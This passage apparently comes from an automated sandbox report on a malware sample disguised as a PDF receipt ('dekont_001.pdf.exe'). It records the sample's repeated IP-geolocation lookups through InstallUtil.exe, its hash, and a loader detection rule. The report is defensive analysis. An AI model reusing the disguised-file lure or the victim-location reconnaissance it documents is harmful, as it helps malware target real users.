67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.449752188.114.97.34437452C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-28 18:04:29 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-10-28 18:04:29 UTC883INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:29 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              apigw-requestid: AVwB0hEZPHcEJng=
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 55330
                                              Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1XKRr29nKqJaV4E550zNNKZv7Jio9mLuxu%2F9yKnpYxh%2FJx68B2XGHHoqiFt32UGAxKUiIvFhG617fXS7QY9aMXM%2BFVzvbSzWAjU5hXwcv%2B0CJ4pgo0Aoq7VzKPCoHmxozh1e3erJ"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8d9cd93afdfe44f9-ATL
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=20095&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=143515&cwnd=32&unsent_bytes=0&cid=3dd8ba0159645196&ts=169&x=0"
                                              2024-10-28 18:04:29 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.449754188.114.97.34438028C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-28 18:04:35 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-10-28 18:04:36 UTC881INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:36 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              apigw-requestid: AVwB0hEZPHcEJng=
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 55337
                                              Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RjeTokSlvjWpqrqmPpkZI6TjyH0Rs2Ihk2TSJd8B9J5F9yXXBNUhH9wpTogTFB3d00ixbXaQ5UaaBwAsNDzdkjUhGnBaRe0%2F2X%2Br6u7zpPw4qUD98KJqJQfW68OyYreR%2F9KF8OLZ"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8d9cd964fd7e4529-ATL
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=17923&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=160888&cwnd=32&unsent_bytes=0&cid=67f766094e5a9513&ts=222&x=0"
                                              2024-10-28 18:04:36 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.449755188.114.97.34438028C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-28 18:04:36 UTC63OUTGET /xml/155.94.241.188 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-10-28 18:04:37 UTC883INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:37 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              apigw-requestid: AVwB0hEZPHcEJng=
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 55338
                                              Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kixL%2Bz8863xSci5iMrd0SVdD2CHgXMQHzy%2Fexp5jClQgaTjJC5gZFC2WVtdQbza3gwPIs%2BXNs588UaANP1mTulJQyJJLivsUCcCb353C6b1atSEXqAjrARH%2FqDUzCWhY1I4IsqXp"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8d9cd96bad5abfff-ATL
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=20142&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=143600&cwnd=32&unsent_bytes=0&cid=df3e8dd42bd10b3e&ts=174&x=0"
                                              2024-10-28 18:04:37 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.449757188.114.97.34438028C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-28 18:04:38 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-10-28 18:04:38 UTC879INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:38 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              apigw-requestid: AVwB0hEZPHcEJng=
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 55339
                                              Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1eUh4SgKbJdJiDcFu0xJCk7E9xo9euCta83ac7A%2FtUy7klvTWyshSdlBAtZHoMSS1ocIYKzZ8hRPiWGN5a%2BnUaKjrUtd57qkaUTk5vWwZ2rGpbxwNA3QWWtsBNYBzTFM1dPeX4c0"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8d9cd9763b37bd62-ATL
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=17974&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=161616&cwnd=32&unsent_bytes=0&cid=ca05817e1c24f775&ts=170&x=0"
                                              2024-10-28 18:04:38 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.449759188.114.97.34438028C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-28 18:04:40 UTC63OUTGET /xml/155.94.241.188 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-10-28 18:04:40 UTC880INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:40 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              apigw-requestid: AVhc-iOyPHcEJSw=
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 61311
                                              Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Usq5hqPaeNGnFEUpLAwsQGhRcmiEnbveCjNRQ9EO70khnjBLzE71SkaiadfGJMitnaa6a6CX%2Bt%2FX7HInjEHF1GZPujrfIntUXjL9QDbT6L1J6qYjY88SEGu1J4PgOdQw0zseBqgl"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8d9cd980b86e2c87-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1111&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2413333&cwnd=251&unsent_bytes=0&cid=6f6834342edb6365&ts=184&x=0"
                                              2024-10-28 18:04:40 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.449761188.114.97.34438028C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-28 18:04:42 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-10-28 18:04:42 UTC877INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:42 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              apigw-requestid: AVwB0hEZPHcEJng=
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 55343
                                              Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ks4faGBhfEcrH1mXDqUeshPWywqqzgcG4wHFfNOe00CBR4o6GhFkdvVDxdcu6YgrJB9MntuaKMpR49pmCN6BRR2ykzhn%2FBaQel9yjWqY2H6RES9bBo3SOer0GWu5ndb8POuftiYJ"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8d9cd98b4a99453f-ATL
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=17465&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=164676&cwnd=32&unsent_bytes=0&cid=585e345b3d9dcf43&ts=170&x=0"
                                              2024-10-28 18:04:42 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.449763188.114.97.34438028C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-28 18:04:43 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-10-28 18:04:43 UTC882INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:43 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              apigw-requestid: AVhc-iOyPHcEJSw=
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 61314
                                              Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ELJaYXzFgGbB1OzR1WRMzNiIXA4rrkoKrj9LiPLW7syNcpB4CsV41xLFaWNf27uPzOG%2F%2Bnv1NNLQq08E8GMpXdLuuT3iGTDZODpcuVjuWdVSAcmXcuWOIZ%2BwMCRZ9L7ZTifzmcvP"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8d9cd99598d5ead1-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1095&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2403319&cwnd=249&unsent_bytes=0&cid=9eef775ba1ea55d6&ts=160&x=0"
                                              2024-10-28 18:04:43 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.449765188.114.97.34438028C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-28 18:04:45 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-10-28 18:04:45 UTC880INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:45 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              apigw-requestid: AVhc-iOyPHcEJSw=
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 61316
                                              Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=azdj7lWNbPtcvEEhMlpokBU2z0lwpeoeBXBUmets2x4BFXTaKJ3BFn4Qdx9WpAoFIr%2FHi8jJlTSOxW4W3gEpOQPFE8IPQQNJ3VvZU0VcDR7faT%2BI7bPFRtl2so61Ym0e2sRkzODK"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8d9cd99fddda3ab2-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1134&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2475213&cwnd=251&unsent_bytes=0&cid=d41fef76b9b0d8be&ts=159&x=0"
                                              2024-10-28 18:04:45 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.449767188.114.97.34438028C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-28 18:04:47 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-10-28 18:04:47 UTC883INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:47 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              apigw-requestid: AVwB0hEZPHcEJng=
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 55348
                                              Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UFKumhxDo1r0aX1TEKcKVoSnIfybDV6hvQFExpoj%2B1GqZ817BY1E0RNY13qYM0asC78%2FjTX%2FMhTswh%2FxvDJ81SlITkkRjNc50M8VKGcZZFa1rH6aN8FjS6cOP3UJ2Eg4YbAY76Mc"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8d9cd9aa9cb9bfdd-ATL
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=20292&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=142984&cwnd=32&unsent_bytes=0&cid=f412d8213bfbcb2f&ts=178&x=0"
                                              2024-10-28 18:04:47 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:14:04:05
                                              Start date:28/10/2024
                                              Path:C:\Users\user\Desktop\dekont_001.pdf.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\dekont_001.pdf.exe"
                                              Imagebase:0x550000
                                              File size:76'288 bytes
                                              MD5 hash:D998DA7BE623B6299E9257FCF5F80E3E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1844604505.0000000006770000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
